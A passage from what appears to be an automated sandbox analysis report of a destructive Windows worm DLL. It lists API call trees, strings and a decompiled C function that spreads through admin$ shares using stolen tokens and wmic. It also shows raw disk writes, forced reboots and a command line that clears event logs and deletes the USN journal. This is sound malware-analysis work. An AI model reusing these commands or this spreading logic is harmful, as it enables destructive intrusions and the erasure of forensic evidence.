      • Part of subcall function 011E6A2B: StrToIntW.SHLWAPI(00000000), ref: 011E6A75
      • Part of subcall function 011E6A2B: StrStrW.SHLWAPI(00000000,011F3FF0), ref: 011E6A95
      • Part of subcall function 011E6A2B: StrChrW.SHLWAPI(00000000,0000003A), ref: 011E6AA2
      • Part of subcall function 011E6A2B: LocalFree.KERNEL32(00000000,?,00000000,?,?,011E7E71,?), ref: 011E6ACF
      • Part of subcall function 011E84DF: GetLocalTime.KERNEL32(?,00000000), ref: 011E84F1
      • Part of subcall function 011E84DF: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 011E8533
      • Part of subcall function 011E84DF: PathAppendW.SHLWAPI(?,shutdown.exe /r /f), ref: 011E854D
      • Part of subcall function 011E84DF: wsprintfW.USER32 ref: 011E8589
      • Part of subcall function 011E84DF: wsprintfW.USER32 ref: 011E85A9
    • CreateThread.KERNEL32(00000000,00000000,011E7C10,00000000,00000000,00000000), ref: 011E7E99
    • NtRaiseHardError.NTDLL(C0000350,00000000,00000000,00000000,00000006,?), ref: 011E8190
      • Part of subcall function 011E7545: GetCurrentProcess.KERNEL32(?,76E6DE72,?,011E7EB2), ref: 011E755C
      • Part of subcall function 011E7545: GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,76E6DE72,?,011E7EB2), ref: 011E7571
      • Part of subcall function 011E7545: GetProcAddress.KERNEL32(00000000,?,76E6DE72,?,011E7EB2), ref: 011E7578
      • Part of subcall function 011E7545: IsWow64Process.KERNELBASE(00000000,?,?,76E6DE72,?,011E7EB2), ref: 011E7587
      • Part of subcall function 011E7545: FindResourceW.KERNEL32(00000001,0000000A), ref: 011E759B
      • Part of subcall function 011E7545: GetTempPathW.KERNEL32(00000208,?), ref: 011E75CC
      • Part of subcall function 011E7545: GetTempFileNameW.KERNELBASE(?,00000000,00000000,?,?,76E6DE72,?,011E7EB2), ref: 011E75EA
      • Part of subcall function 011E7545: CoCreateGuid.OLE32(?), ref: 011E7608
      • Part of subcall function 011E7545: StringFromCLSID.OLE32(?,?), ref: 011E7621
      • Part of subcall function 011E7545: wsprintfW.USER32 ref: 011E765E
      • Part of subcall function 011E7545: CreateThread.KERNEL32(00000000,00000000,011E73FD,?,00000000,00000000), ref: 011E7675
      • Part of subcall function 011E7545: memset.MSVCRT ref: 011E7698
      • Part of subcall function 011E7545: wsprintfW.USER32 ref: 011E76C0
      • Part of subcall function 011E7545: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 011E76E5
      • Part of subcall function 011E7545: WaitForSingleObject.KERNEL32(?,0000EA60), ref: 011E76F7
      • Part of subcall function 011E7545: TerminateThread.KERNELBASE(?,00000000), ref: 011E770C
      • Part of subcall function 011E7545: CloseHandle.KERNEL32(?), ref: 011E7715
      • Part of subcall function 011E7545: DeleteFileW.KERNELBASE(?,?,?), ref: 011E7744
      • Part of subcall function 011E7545: CoTaskMemFree.OLE32(?), ref: 011E774D
      • Part of subcall function 011E7545: GetProcessHeap.KERNEL32(00000000,?,?,76E6DE72,?,011E7EB2), ref: 011E776A
      • Part of subcall function 011E7545: HeapFree.KERNEL32(00000000,?,76E6DE72), ref: 011E7771
      • Part of subcall function 011E835E: PathFileExistsW.SHLWAPI(?), ref: 011E8381
      • Part of subcall function 011E835E: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,04000000,00000000), ref: 011E83A1
      • Part of subcall function 011E835E: ExitProcess.KERNEL32(00000000), ref: 011E83B6
      • Part of subcall function 011E8D5A: CreateFileA.KERNEL32(\\.\C:,40000000,00000003,00000000,00000003,00000000,00000000), ref: 011E8D79
      • Part of subcall function 011E8D5A: DeviceIoControl.KERNEL32(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 011E8D9A
      • Part of subcall function 011E8D5A: LocalAlloc.KERNEL32(00000000,?), ref: 011E8DAD
      • Part of subcall function 011E8D5A: SetFilePointer.KERNELBASE(00000000,?,00000000,00000000), ref: 011E8DC0
      • Part of subcall function 011E8D5A: WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 011E8DD2
      • Part of subcall function 011E8D5A: LocalFree.KERNEL32(00000000), ref: 011E8DD9
      • Part of subcall function 011E8D5A: CloseHandle.KERNEL32(00000000), ref: 011E8DE0
      • Part of subcall function 011E70FA: EnterCriticalSection.KERNEL32(002E6710,011E7EBD), ref: 011E70FF
      • Part of subcall function 011E70FA: InterlockedExchange.KERNEL32(002E6738,00000001), ref: 011E710B
      • Part of subcall function 011E70FA: LeaveCriticalSection.KERNEL32(002E6710), ref: 011E7112
    • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000001,80000000), ref: 011E819E
      • Part of subcall function 011E875A: memset.MSVCRT ref: 011E878C
      • Part of subcall function 011E875A: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 011E87A4
      • Part of subcall function 011E875A: Process32FirstW.KERNEL32 ref: 011E87C5
      • Part of subcall function 011E875A: OpenProcess.KERNEL32(00000450,00000000,0000022C), ref: 011E87FF
      • Part of subcall function 011E875A: OpenProcessToken.ADVAPI32(00000000,02000000,?), ref: 011E8818
      • Part of subcall function 011E875A: GetTokenInformation.ADVAPI32(000000FF,0000000C,?,00000004,?), ref: 011E883E
      • Part of subcall function 011E875A: DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000002,?), ref: 011E8867
      • Part of subcall function 011E875A: memset.MSVCRT ref: 011E887D
      • Part of subcall function 011E875A: GetTokenInformation.ADVAPI32(?,0000000A,?,00000038,?,?,00000000,?), ref: 011E8897
      • Part of subcall function 011E875A: SetTokenInformation.ADVAPI32(?,0000000C,?,00000004,?,00000000,?), ref: 011E88C6
      • Part of subcall function 011E875A: CloseHandle.KERNEL32(?), ref: 011E8901
      • Part of subcall function 011E875A: CloseHandle.KERNEL32(?), ref: 011E8907
      • Part of subcall function 011E875A: Process32NextW.KERNEL32(?,?), ref: 011E8919
      • Part of subcall function 011E875A: GetLastError.KERNEL32 ref: 011E8929
      • Part of subcall function 011E875A: CloseHandle.KERNEL32(?), ref: 011E8933
      • Part of subcall function 011E8999: FindResourceW.KERNEL32(00000003,0000000A,00000000), ref: 011E89B9
      • Part of subcall function 011E8999: GetProcessHeap.KERNEL32(00000008,00000208,002E6710), ref: 011E89EA
      • Part of subcall function 011E8999: HeapAlloc.KERNEL32(00000000), ref: 011E89ED
      • Part of subcall function 011E8999: GetWindowsDirectoryW.KERNEL32(00000000,00000104), ref: 011E8A0A
      • Part of subcall function 011E8999: SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,00000000), ref: 011E8A1A
      • Part of subcall function 011E8999: PathAppendW.SHLWAPI(dllhost.dat), ref: 011E8A51
      • Part of subcall function 011E8999: GetProcessHeap.KERNEL32(00000000), ref: 011E8A61
      • Part of subcall function 011E8999: HeapFree.KERNEL32(00000000), ref: 011E8A64
      • Part of subcall function 011E8999: GetLastError.KERNEL32(01442A10,?,00000000), ref: 011E8A88
      • Part of subcall function 011E8999: GetProcessHeap.KERNEL32(00000000,?), ref: 011E8AB7
      • Part of subcall function 011E8999: HeapFree.KERNEL32(00000000), ref: 011E8ABA
      • Part of subcall function 011E8999: SetLastError.KERNEL32(?), ref: 011E8AC0
    • CreateThread.KERNEL32(00000000,00000000,011E9F8E,00000000,00000004,00000000), ref: 011E7F2B
    • SetThreadToken.ADVAPI32(?,?), ref: 011E7F3B
    • ResumeThread.KERNEL32(?), ref: 011E7F48
    • GetLastError.KERNEL32 ref: 011E7F55
    • CloseHandle.KERNEL32(?), ref: 011E7F61
    • SetLastError.KERNEL32(00000057), ref: 011E7F73
    • CreateThread.KERNEL32(00000000,00000000,011E7D58,?,00000004,00000000), ref: 011E7F8F
    • SetThreadToken.ADVAPI32(000000FF,00000057), ref: 011E7F9F
    • ResumeThread.KERNEL32(000000FF), ref: 011E7FAC
    • WaitForSingleObject.KERNEL32(000000FF,000000FF), ref: 011E7FBC
    • GetLastError.KERNEL32 ref: 011E7FC4
    • CloseHandle.KERNEL32(000000FF), ref: 011E7FCD
      • Part of subcall function 011E7298: EnterCriticalSection.KERNEL32(?,00000000,00000000,00000000,-00000002,?,011E6FFB,00000001,?,00000000), ref: 011E72B9
      • Part of subcall function 011E7298: GetProcessHeap.KERNEL32(00000008,00000008,00000001,00000000,?,011E6FFB,00000001,?,00000000), ref: 011E72EA
      • Part of subcall function 011E7298: HeapAlloc.KERNEL32(00000000,?,011E6FFB,00000001,?,00000000), ref: 011E72F3
      • Part of subcall function 011E7298: GetProcessHeap.KERNEL32(00000008,?,?,011E6FFB,00000001,?,00000000), ref: 011E730B
      • Part of subcall function 011E7298: HeapAlloc.KERNEL32(00000000,?,011E6FFB,00000001,?,00000000), ref: 011E730E
      • Part of subcall function 011E7298: memcpy.MSVCRT ref: 011E733F
      • Part of subcall function 011E7298: GetProcessHeap.KERNEL32(00000000,?,?,011E6FFB,00000001,?,00000000), ref: 011E7358
      • Part of subcall function 011E7298: HeapFree.KERNEL32(00000000,?,011E6FFB), ref: 011E735B
      • Part of subcall function 011E7298: GetProcessHeap.KERNEL32(00000008,?,?,00000001,00000000,?,011E6FFB,00000001,?,00000000), ref: 011E7373
      • Part of subcall function 011E7298: HeapReAlloc.KERNEL32(00000000,?,011E6FFB,00000001,?,00000000), ref: 011E737A
      • Part of subcall function 011E7298: LeaveCriticalSection.KERNEL32(?,00000001,00000000,?,011E6FFB,00000001,?,00000000), ref: 011E739E
    • CreateThread.KERNEL32(00000000,00000000,011EA0FE,00000000,00000000,00000000), ref: 011E8006
      • Part of subcall function 011E8282: NetServerGetInfo.NETAPI32(00000000,00000065,?,00000000,00000000,76E6DE72,?,?,011E8029,000000FF,?,?,?), ref: 011E82A8
      • Part of subcall function 011E8282: NetApiBufferFree.NETAPI32(?,?,?,011E8029,000000FF,?,?,?), ref: 011E82C1
    • GetProcessHeap.KERNEL32(00000008,00000004,000000FF,?,?,?), ref: 011E8033
    • HeapAlloc.KERNEL32(00000000), ref: 011E8036
    • CreateThread.KERNEL32(00000000,00000000,011EA274,00000000,00000000,00000000), ref: 011E8058
    • GetProcessHeap.KERNEL32(00000000,?), ref: 011E8062
    • HeapFree.KERNEL32(00000000), ref: 011E8065
    • Sleep.KERNELBASE(000000FF), ref: 011E807B
    • ExitWindowsEx.USER32(00000006,00000000), ref: 011E81AF
      • Part of subcall function 011E1EEF: GetLogicalDrives.KERNEL32 ref: 011E1EF7
      • Part of subcall function 011E1EEF: GetDriveTypeW.KERNELBASE(?,?,?,?,011E808B), ref: 011E1F2E
      • Part of subcall function 011E1EEF: LocalAlloc.KERNEL32(00000040,00000020,?,?,?,011E808B), ref: 011E1F3D
      • Part of subcall function 011E1EEF: CreateThread.KERNEL32(00000000,00000000,011E1E51,00000000,00000000,00000000), ref: 011E1F66
    • Sleep.KERNELBASE(?), ref: 011E8095
    • memset.MSVCRT ref: 011E80AE
    • GetVersionExW.KERNEL32(?), ref: 011E80C3
      • Part of subcall function 011E6BB0: wsprintfW.USER32 ref: 011E6BD3
      • Part of subcall function 011E6BB0: EnterCriticalSection.KERNEL32(011FF124,00000000,00000114,76E6C426), ref: 011E6BFE
      • Part of subcall function 011E6BB0: StrCatW.SHLWAPI(?,?), ref: 011E6C4C
      • Part of subcall function 011E6BB0: StrCatW.SHLWAPI(?,011FB110), ref: 011E6C52
      • Part of subcall function 011E6BB0: SetLastError.KERNEL32(0000007A), ref: 011E6C5A
      • Part of subcall function 011E6BB0: LeaveCriticalSection.KERNEL32(011FF124), ref: 011E6C65
      • Part of subcall function 011E7D6F: Sleep.KERNEL32(00000BB8,127.0.0.1,?,?,00000114), ref: 011E7DB7
      • Part of subcall function 011E7D6F: PathFileExistsW.SHLWAPI(?), ref: 011E7DD4
    • ExitProcess.KERNEL32 ref: 011E8115
    • Sleep.KERNELBASE(?), ref: 011E8125
    • wsprintfW.USER32 ref: 011E813B
      • Part of subcall function 011E83BD: wsprintfW.USER32 ref: 011E83DC
      • Part of subcall function 011E83BD: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 011E8400
      • Part of subcall function 011E83BD: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 011E8412
      • Part of subcall function 011E83BD: lstrcatW.KERNEL32(?,\cmd.exe), ref: 011E8428
      • Part of subcall function 011E83BD: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 011E846F
      • Part of subcall function 011E83BD: Sleep.KERNELBASE(011E85C7), ref: 011E8485
    • GetModuleHandleA.KERNEL32(ntdll.dll,00000003), ref: 011E8168
    • GetProcAddress.KERNEL32(00000000,NtRaiseHardError), ref: 011E8178
      • Part of subcall function 011E9590: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,011E7E14,?,?,?), ref: 011E95CC
      • Part of subcall function 011E9590: memcpy.MSVCRT ref: 011E95E5
      • Part of subcall function 011E9590: VirtualProtect.KERNEL32(00000000,?,00000004,?), ref: 011E9654
      • Part of subcall function 011E9590: VirtualFree.KERNEL32(00000000,?,00004000), ref: 011E9674
    Strings
    • wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:, xrefs: 011E8135
    • W, xrefs: 011E7F69
    • ntdll.dll, xrefs: 011E8163
    • NtRaiseHardError, xrefs: 011E8172
    • =B|v, xrefs: 011E813B
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E9987, Relevance: 58.0, APIs: 29, Strings: 4, Instructions: 296
    C-Code - Quality: 62%
    			E011E9987(int _a4, short* _a8, short* _a12, signed int _a16, int _a20, int _a24, long _a28, void* _a32, void* _a36, long _a40, signed int _a44, void* _a48, void* _a52, char _a64, void _a68, intOrPtr _a108, short _a112, int _a120, void _a124, struct _NETRESOURCE _a128, char* _a140, short _a144, char _a152, short _a168, char _a668, char _a672, char _a680, char _a1208, short _a2760, short _a2768, short _a4796, short _a4816, char _a6864) {
				int _v0;
				void* __ebx;
				void* __esi;
				signed int _t122;
				int _t137;
				WCHAR* _t142;
				void* _t144;
				signed int _t147;
				int _t163;
				signed int _t170;
				long _t181;
				int _t185;
				short* _t188;
				intOrPtr _t190;
				int _t191;
				signed int _t194;
				WCHAR* _t203;
				union tagTOKEN_TYPE _t206;
				signed int _t213;
				signed int _t214;
				void* _t217;

				_t214 = _t213 & 0xfffffff8;
				E011EA4F0(0x11abc);
				_t188 = 0;
				_v0 = 0;
				_a4 = 0;
				_a20 = 0;
				if(_a4 == 0) {
					_a4 = 0x57;
					goto L60;
				} else {
					_a144 = 0;
					wsprintfW( &_a144, L"\\\\%s\\admin$", _a4);
					_t194 = 7;
					_a120 = 0;
					memset( &_a124, 0, _t194 << 2);
					_a140 =  &_a152;
					_a124 = 1;
					E011E8B70( &_a672);
					_t203 = L"\\\\%ws\\admin$\\%ws";
					wsprintfW( &_a4796, _t203, _a4,  &_a668);
					_t217 = _t214 + 0x28;
					while(1) {
						_a2760 = 0;
						_a12 = _t188;
						_t137 = WNetAddConnection2W( &_a128, _a12, _a8, 0); // executed
						_a36 = _t137;
						wsprintfW( &_a2760, _t203, _a4,  &_a680);
						_t217 = _t217 + 0x10;
						_t142 = PathFindExtensionW( &_a2768);
						if(_t142 == 0) {
							goto L5;
						}
						 *_t142 = 0;
						_t185 = PathFileExistsW( &_a2768); // executed
						if(_t185 != 0) {
							_a24 = 1;
							L57:
							__eflags = _a44;
							if(_a44 == 0) {
								WNetCancelConnection2W( &_a168, 0, 1); // executed
							}
							L60:
							_t122 = _a16;
							__eflags = _t122;
							if(_t122 != 0) {
								 *_t122 = _a20;
							}
							SetLastError(_a4);
							return _v0;
						} else {
							_a28 = GetLastError();
						}
						L5:
						_t190 =  *0x11ff11c; // 0x58778
						_t144 = E011E8946(_t190,  &_a4816,  *0x11ff0fc, 1); // executed
						_t191 = 0;
						if(_t144 != 0) {
							__eflags = _a8;
							if(_a8 != 0) {
								__eflags = _a12;
								if(_a12 != 0) {
									E011E6CE7(_a8, _a12);
									 *0x11f6010 = 1;
								}
							}
							_a36 = _t191;
							_a32 = _t191;
							_t147 = OpenThreadToken(GetCurrentThread(), 2, 1,  &_a36);
							__eflags = _t147;
							if(_t147 != 0) {
								DuplicateTokenEx(_a36, 0x2000000, _t191, 2, 1,  &_a32);
							}
							_a20 = _t191;
							while(1) {
								__eflags = _a24 - _t191;
								if(_a24 != _t191) {
									break;
								}
								_a6864 = 0;
								_a1208 = 0;
								_a48 = _t191;
								asm("stosd");
								asm("stosd");
								asm("stosd");
								memset( &_a68, _t191, 0x40);
								_t206 = 1;
								_t217 = _t217 + 0xc;
								_a64 = 0x44;
								_a108 = 1;
								_a112 = 0;
								__eflags = _a20 - _t191;
								if(__eflags == 0) {
									E011E97A5( &_a6864,  &_a1208, __eflags, _a4);
									_t191 = 0;
									__eflags = 0;
								}
								__eflags = _a20 - _t206;
								if(_a20 != _t206) {
									L26:
									__eflags = _a6864 - _t191;
									if(_a6864 == _t191) {
										L49:
										_a28 = GetLastError();
										L50:
										_a20 = _a20 + 1;
										__eflags = _a20 - 2;
										if(_a20 < 2) {
											continue;
										}
										__eflags = _a24 - _t191;
										if(_a24 != _t191) {
											break;
										}
										goto L52;
									}
									__eflags = _a1208 - _t191;
									if(_a1208 == _t191) {
										goto L49;
									}
									_push( &_a48);
									_push( &_a64);
									_push(_t191);
									_push(_t191);
									_push(0x8000000);
									_push(_t191);
									_push(_t191);
									_push(_t191);
									_push( &_a6864);
									_push( &_a1208);
									__eflags = _a32 - _t191;
									if(_a32 == _t191) {
										_t163 = CreateProcessW();
									} else {
										_t163 = CreateProcessAsUserW(_a32, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??);
									}
									__eflags = _t163 - _t191;
									if(_t163 == _t191) {
										goto L49;
									} else {
										WaitForSingleObject(_a48, 0xffffffff);
										_a40 = _t191;
										GetExitCodeProcess(_a48,  &_a40);
										__eflags = _a128 - _t191;
										if(_a128 != _t191) {
											CloseHandle(_a128);
										}
										__eflags = _a120 - _t191;
										if(_a120 != _t191) {
											CloseHandle(_a120);
										}
										__eflags = _a124 - _t191;
										if(_a124 != _t191) {
											CloseHandle(_a124);
										}
										__eflags = _a52 - _t191;
										if(_a52 != _t191) {
											CloseHandle(_a52);
										}
										__eflags = _a48 - _t191;
										if(_a48 != _t191) {
											CloseHandle(_a48);
										}
										__eflags = _a20 - _t191;
										if(_a20 != _t191) {
											__eflags = _a20 - _t206;
											if(_a20 != _t206) {
												goto L48;
											}
											__eflags = _a40 - _t191;
											_t170 = 0 | _a40 == _t191;
											_a24 = _t170;
											__eflags = _t170 - _t191;
											if(_t170 != _t191) {
												goto L50;
											}
											goto L48;
										} else {
											__eflags = _a40 - _t191;
											if(_a40 == _t191) {
												L48:
												_a24 = PathFileExistsW( &_a2768);
												goto L50;
											}
											__eflags = _a40 & 0x00000003;
											if((_a40 & 0x00000003) != 0) {
												goto L48;
											}
											_a24 = _t206;
											goto L50;
										}
									}
								} else {
									__eflags = _a8 - _t191;
									if(_a8 == _t191) {
										L52:
										DeleteFileW( &_a4816);
										break;
									}
									__eflags = _a12 - _t191;
									if(__eflags == 0) {
										goto L52;
									}
									E011E98AB( &_a1208,  &_a6864, __eflags, _a4, _a8, _a12);
									_t206 = 1;
									_t191 = 0;
									__eflags = 0;
									goto L26;
								}
							}
							__eflags = _a32 - _t191;
							if(_a32 != _t191) {
								CloseHandle(_a32);
								_a32 = _t191;
							}
							__eflags = _a36 - _t191;
							if(_a36 != _t191) {
								CloseHandle(_a36);
							}
							goto L57;
						}
						_t181 = GetLastError();
						_a28 = _t181;
						if(_t181 == 0x50 || _t181 == 0x35 || _t181 == 0x43 || _a44 != 0x4c3) {
							goto L57;
						} else {
							if(_a20 != 0) {
								goto L60;
							}
							_t188 = 1;
							WNetCancelConnection2W( &_a168, 0, 1);
							continue;
						}
					}
				}
			}
























    0x011e998a
    0x011e9992
    0x011e9998
    0x011e999c
    0x011e99a0
    0x011e99a4
    0x011e99ab
    0x011e9d97
    0x00000000
    0x011e99b1
    0x011e99bc
    0x011e99d1
    0x011e99da
    0x011e99db
    0x011e99e9
    0x011e99f2
    0x011e9a01
    0x011e9a0c
    0x011e9a1c
    0x011e9a2a
    0x011e9a2c
    0x011e9a2f
    0x011e9a35
    0x011e9a48
    0x011e9a4c
    0x011e9a52
    0x011e9a6a
    0x011e9a6c
    0x011e9a77
    0x011e9a7f
    0x00000000
    0x00000000
    0x011e9a83
    0x011e9a8e
    0x011e9a96
    0x011e9b17
    0x011e9d7c
    0x011e9d7c
    0x011e9d81
    0x011e9d8f
    0x011e9d8f
    0x011e9d9f
    0x011e9d9f
    0x011e9da2
    0x011e9da4
    0x011e9daa
    0x011e9daa
    0x011e9db0
    0x011e9dc0
    0x011e9a98
    0x011e9a9e
    0x011e9a9e
    0x011e9aa2
    0x011e9aa2
    0x011e9ab8
    0x011e9abd
    0x011e9ac1
    0x011e9b24
    0x011e9b27
    0x011e9b29
    0x011e9b2c
    0x011e9b34
    0x011e9b39
    0x011e9b39
    0x011e9b2c
    0x011e9b4c
    0x011e9b50
    0x011e9b5b
    0x011e9b61
    0x011e9b63
    0x011e9b78
    0x011e9b78
    0x011e9b7e
    0x011e9b82
    0x011e9b82
    0x011e9b86
    0x00000000
    0x00000000
    0x011e9b8e
    0x011e9b96
    0x011e9b9e
    0x011e9ba6
    0x011e9ba7
    0x011e9baa
    0x011e9bb1
    0x011e9bb8
    0x011e9bbb
    0x011e9bbe
    0x011e9bc6
    0x011e9bca
    0x011e9bcf
    0x011e9bd3
    0x011e9be6
    0x011e9beb
    0x011e9beb
    0x011e9beb
    0x011e9bed
    0x011e9bf1
    0x011e9c26
    0x011e9c26
    0x011e9c2e
    0x011e9d2b
    0x011e9d31
    0x011e9d35
    0x011e9d35
    0x011e9d39
    0x011e9d3e
    0x00000000
    0x00000000
    0x011e9d44
    0x011e9d48
    0x00000000
    0x00000000
    0x00000000
    0x011e9d48
    0x011e9c34
    0x011e9c3c
    0x00000000
    0x00000000
    0x011e9c46
    0x011e9c4b
    0x011e9c4c
    0x011e9c4d
    0x011e9c4e
    0x011e9c53
    0x011e9c54
    0x011e9c5c
    0x011e9c5d
    0x011e9c65
    0x011e9c66
    0x011e9c6a
    0x011e9c78
    0x011e9c6c
    0x011e9c70
    0x011e9c70
    0x011e9c7e
    0x011e9c80
    0x00000000
    0x011e9c86
    0x011e9c8c
    0x011e9c9b
    0x011e9c9f
    0x011e9cab
    0x011e9caf
    0x011e9cb5
    0x011e9cb5
    0x011e9cb7
    0x011e9cbb
    0x011e9cc1
    0x011e9cc1
    0x011e9cc3
    0x011e9cc7
    0x011e9ccd
    0x011e9ccd
    0x011e9ccf
    0x011e9cd3
    0x011e9cd9
    0x011e9cd9
    0x011e9cdb
    0x011e9cdf
    0x011e9ce5
    0x011e9ce5
    0x011e9ce7
    0x011e9ceb
    0x011e9d00
    0x011e9d04
    0x00000000
    0x00000000
    0x011e9d08
    0x011e9d0c
    0x011e9d0f
    0x011e9d13
    0x011e9d15
    0x00000000
    0x00000000
    0x00000000
    0x011e9ced
    0x011e9ced
    0x011e9cf1
    0x011e9d17
    0x011e9d25
    0x00000000
    0x011e9d25
    0x011e9cf3
    0x011e9cf8
    0x00000000
    0x00000000
    0x011e9cfa
    0x00000000
    0x011e9cfa
    0x011e9ceb
    0x011e9bf3
    0x011e9bf3
    0x011e9bf6
    0x011e9d4a
    0x011e9d52
    0x00000000
    0x011e9d52
    0x011e9bfc
    0x011e9bff
    0x00000000
    0x00000000
    0x011e9c1c
    0x011e9c23
    0x011e9c24
    0x011e9c24
    0x00000000
    0x011e9c24
    0x011e9bf1
    0x011e9d58
    0x011e9d5c
    0x011e9d62
    0x011e9d68
    0x011e9d68
    0x011e9d6c
    0x011e9d70
    0x011e9d76
    0x011e9d76
    0x00000000
    0x011e9d70
    0x011e9ac3
    0x011e9ac9
    0x011e9ad0
    0x00000000
    0x011e9af6
    0x011e9afa
    0x00000000
    0x00000000
    0x011e9b00
    0x011e9b0c
    0x00000000
    0x011e9b0c
    0x011e9ad0
    0x011e9a2f

    APIs
    • wsprintfW.USER32 ref: 011E99D1
      • Part of subcall function 011E8B70: PathFindFileNameW.SHLWAPI(C:\Users\luketaylor\Desktop\abc.dll), ref: 011E8B80
    • wsprintfW.USER32 ref: 011E9A2A
    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 011E9A4C
    • wsprintfW.USER32 ref: 011E9A6A
    • PathFindExtensionW.SHLWAPI(?), ref: 011E9A77
    • PathFileExistsW.SHLWAPI(?), ref: 011E9A8E
    • GetLastError.KERNEL32 ref: 011E9A98
      • Part of subcall function 011E8946: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000000,00000000), ref: 011E8963
      • Part of subcall function 011E8946: WriteFile.KERNEL32(00000000,01442A10,?,011E8A84,00000000), ref: 011E897A
      • Part of subcall function 011E8946: CloseHandle.KERNEL32(00000000), ref: 011E898B
    • GetLastError.KERNEL32(?,00000001), ref: 011E9AC3
    • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 011E9B0C
    • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 011E9D8F
      • Part of subcall function 011E6CE7: GetProcessHeap.KERNEL32(00000008,?,767C423D,00000000,?,?,?), ref: 011E6D1D
      • Part of subcall function 011E6CE7: HeapAlloc.KERNEL32(00000000), ref: 011E6D26
      • Part of subcall function 011E6CE7: memcpy.MSVCRT ref: 011E6D53
      • Part of subcall function 011E6CE7: GetProcessHeap.KERNEL32(00000008,?,\\%ws\admin$\%ws), ref: 011E6D78
      • Part of subcall function 011E6CE7: HeapAlloc.KERNEL32(00000000), ref: 011E6D7B
      • Part of subcall function 011E6CE7: memcpy.MSVCRT ref: 011E6DAA
      • Part of subcall function 011E6CE7: GetProcessHeap.KERNEL32(00000000,?,?), ref: 011E6DC7
      • Part of subcall function 011E6CE7: HeapFree.KERNEL32(00000000), ref: 011E6DCA
      • Part of subcall function 011E6CE7: GetProcessHeap.KERNEL32(00000000,?), ref: 011E6DD1
      • Part of subcall function 011E6CE7: HeapFree.KERNEL32(00000000), ref: 011E6DD4
    • GetCurrentThread.KERNEL32(00000002,00000001,?,?,00000001), ref: 011E9B54
    • OpenThreadToken.ADVAPI32(00000000), ref: 011E9B5B
    • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000001,?), ref: 011E9B78
    • memset.MSVCRT ref: 011E9BB1
      • Part of subcall function 011E97A5: SetLastError.KERNEL32(00000003,?,00000001,767C423D,?,011E9BEB,?), ref: 011E9821
      • Part of subcall function 011E97A5: PathFileExistsW.SHLWAPI ref: 011E982C
      • Part of subcall function 011E97A5: wsprintfW.USER32 ref: 011E9846
      • Part of subcall function 011E97A5: wsprintfW.USER32 ref: 011E985A
      • Part of subcall function 011E97A5: memcpy.MSVCRT ref: 011E9889
    • DeleteFileW.KERNEL32(?), ref: 011E9D52
      • Part of subcall function 011E98AB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 011E98D8
      • Part of subcall function 011E98AB: PathAppendW.SHLWAPI(?,wbem\wmic.exe), ref: 011E98EC
      • Part of subcall function 011E98AB: PathFileExistsW.SHLWAPI ref: 011E98F3
      • Part of subcall function 011E98AB: wsprintfW.USER32 ref: 011E9913
      • Part of subcall function 011E98AB: wsprintfW.USER32 ref: 011E9927
      • Part of subcall function 011E98AB: wsprintfW.USER32 ref: 011E9968
      • Part of subcall function 011E98AB: GetLastError.KERNEL32(?,00000104,?,00000001,00000000,?,011E9C21,?,?,?), ref: 011E9971
    • CreateProcessAsUserW.ADVAPI32(?,?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 011E9C70
    • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 011E9C78
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 011E9C8C
    • GetExitCodeProcess.KERNEL32(?,?), ref: 011E9C9F
    • CloseHandle.KERNEL32(?), ref: 011E9CB5
    • CloseHandle.KERNEL32(?), ref: 011E9CC1
    • CloseHandle.KERNEL32(?), ref: 011E9CCD
    • CloseHandle.KERNEL32(?), ref: 011E9CD9
    • CloseHandle.KERNEL32(?), ref: 011E9CE5
    • PathFileExistsW.SHLWAPI(?), ref: 011E9D1F
    • GetLastError.KERNEL32 ref: 011E9D2B
    • CloseHandle.KERNEL32(?), ref: 011E9D62
    • CloseHandle.KERNEL32(?), ref: 011E9D76
    • SetLastError.KERNEL32(00000057,00000000,?,?,?,011EA0C9,?,00000000,00000000,00000000), ref: 011E9DB0
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E1038, Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 175
